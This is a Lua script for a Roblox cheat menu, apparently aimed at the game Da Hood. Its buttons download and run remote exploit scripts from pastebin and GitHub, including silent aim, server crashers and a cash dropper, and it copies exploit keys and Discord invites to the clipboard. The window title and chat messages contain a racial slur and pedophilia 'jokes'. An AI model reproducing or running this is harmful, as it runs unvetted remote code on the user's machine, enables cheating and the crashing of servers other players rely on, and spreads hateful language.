loadstring(game:HttpGet("https://pastebin.com/raw/1mMWWDXE"))()
wait(0.5)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
   Text = "[Notice] GUI Last Updated 5-10-21 , Hey Peter";
   Color = Color3.new(255, 0, 72);
   Font = Enum.Font.SourceSansBold;
   FontSize = Enum.FontSize.Size24;
})

game.StarterGui:SetCore("ChatMakeSystemMessage", {
   Text = "[Warning] By EXECUTING this GUI you are now a segistered sex offender!";
   Color = Color3.new(255, 0, 0);
   Font = Enum.Font.SourceSansBold;
   FontSize = Enum.FontSize.Size24;
})



-- init
local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/GreenDeno/Venyx-UI-Library/main/source.lua"))()
local venyx = library.new("PedoFile Gui    Nooy Is A Nigger", 5013109572)

-- themes
local themes = {
Background = Color3.fromRGB(24, 24, 24),
Glow = Color3.fromRGB(0, 0, 0),
Accent = Color3.fromRGB(10, 10, 10),
LightContrast = Color3.fromRGB(20, 20, 20),
DarkContrast = Color3.fromRGB(14, 14, 14),  
TextColor = Color3.fromRGB(255, 255, 255)
}

-- first page
local page = venyx:addPage("Best Scripts", 5012544693)
local section1 = page:addSection("Scripts")
local section2 = page:addSection("KeyBind")

section1:addButton("Valiant", function()
loadstring(game:HttpGet(("https://pastebin.com/raw/FMnCZbW5"), true))();
end)

section1:addButton("Swag Mode", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagModeV002"))()
end)

section1:addButton("Silent Aim", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/wfwf/main/aimbot"))()
end)

section1:addButton("Da Hood Crasher", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/22kristina/dhcrash_gen2/main/crash", true))()
end)

section1:addButton("Da Hood Crashed 2", function()
loadstring(game:HttpGet("loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()", true))()
end)

-- thrid page
local page = venyx:addPage("Guis", 5012544693)
local section3 = page:addSection("Gui Page")
section3:addButton("LegacyX", function()
repeat
    wait();
until game:IsLoaded();
loadstring(game:HttpGet('https://raw.githubusercontent.com/Compwnter/LegacyX/main/script.lua'))();
end)

section3:addButton("LegacyX Key", function()
setclipboard("5bfa8f0c6c03818a87bd2cd9e3dcc2179218d8ab5905509ba2616511eabe744d")
end)

section3:addButton("Zordion", function()
repeat
wait()
until game:IsLoaded()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/zordion/main/script.lua"))()end)

section3:addButton("Zordion Key", function()
setclipboard("zordioniscool")
end)

section3:addButton("Da-Hoodian Ware (Shitty Silent Aim)", function()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Enviie/Cypher-X-DaHoodian-Ware/main/Cypher%20X%20DaHoodian-Ware%20Main.lua"))("Enviie Soo Hot!")
end)

section3:addButton("RaycodeX", function()
loadstring(game:GetObjects("rbxassetid://5812737894")[1].Source)()
end)

section3:addButton("NightX", function()
loadstring(game:HttpGet(("https://pastebin.com/raw/u0Tg3PsM"), true))();
end)

section3:addButton("Lora X New", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/XptzExploits/dahood/main/loraxnew"))()
end)

section3:addButton("Lora X Old", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/XptzExploits/dahood/main/loraxold"))()
end)

-- fourth page
local page = venyx:addPage("Solo Scripts", 5012544693)
local section4 = page:addSection("Script Page")

section4:addButton("Anti Stomp", function()
loadstring(game:HttpGet("https://pastebin.com/raw/hJTKLHvS"))()
end)

section4:addButton("Audio Logger", function()
loadstring(game:HttpGet("https://pastebin.com/raw/iXtePLpF"))()
end)

section4:addButton("Ray Code Cash Dropper", function()
loadstring(game:HttpGet(("https://raw.githubusercontent.com/Raycodex/Exploiting/main/Roblox/Da%20Hood%20Auto%20Cash%20Drop"), true))()
end)

-- fith page
local page = venyx:addPage("Music Ids", 5012544693)
local section5 = page:addSection("Ids")

section5:addButton("Mexican BOP", function()
setclipboard("5972127403")
end)

section5:addButton("EMOTEGI - UNDER MY SKIN", function()
setclipboard("4498153931")
end)

section5:addButton("Alabama Neighbor", function()
setclipboard("6546444546")
end)

section5:addButton("BUSTER -$atori Zoom", function()
setclipboard("5971707317")
end)

section5:addButton("Ong - kwuzi", function()
setclipboard("6607366358")
end)

section5:addButton("yameii - baby my phone", function()
setclipboard("6457694642")
end)

section5:addButton("Lil Darkie - drink my piss you nasty slut yeah yeah", function()
setclipboard("5578146842")
end)


section5:addButton("C2D - With my hoe", function()
setclipboard("5790506499")
end)

section5:addButton("#BrooklynBloodPop", function()
setclipboard("6528607507")
end)

section5:addButton("Deadx - I Will Break My Own Heart", function()
setclipboard("5012734344")
end)

section5:addButton("Lieu - Drain", function()
setclipboard("6741212947 ")
end)


section5:addButton("Weeekly(위클리) - After School (K-Pop)", function()
setclipboard("6556456475 ")
end)

-- sixth page
local page = venyx:addPage("Discord Invites", 5012544693)
local section6 = page:addSection("Servers")

section6:addButton("Legacyx Discord", function()
setclipboard("https://discord.io/legacyx")
end)

section6:addButton("RaycodeX Discord", function()
setclipboard("https://discord.gg/S3zZz9Zgdu")
end)

section6:addButton("Swagmode Discord", function()
setclipboard("https://discord.gg/gR2U2RpFXs")
end)

section6:addButton("Valiant Discord", function()
setclipboard("https://discord.gg/gR2U2RpFXs")
end)

section6:addButton("Cypher X Discord", function()
setclipboard("https://discord.com/invite/Q63u37Tctc")
end)


-- seventh page
local page = venyx:addPage("Change Logs", 5012544693)
local section7 = page:addSection("Updates")

section7:addButton("5-10-21 Last Updated", function()
print("5-10-21 Last Updated")
end)

section7:addButton("Changed Alot", function()
print("5-10-21 Last Updated")
end)



-- second page
local theme = venyx:addPage("Theme", 5012544693)
local colors = theme:addSection("Colors")

for theme, color in pairs(themes) do -- all in one theme changer, i know, im cool
colors:addColorPicker(theme, color, function(color3)
venyx:setTheme(theme, color3)
end)
end

section2:addKeybind("Toggle Keybind", Enum.KeyCode.KeypadOne, function()
venyx:toggle()
end, function()
end)

-- load
venyx:SelectPage(venyx.pages[1], true)
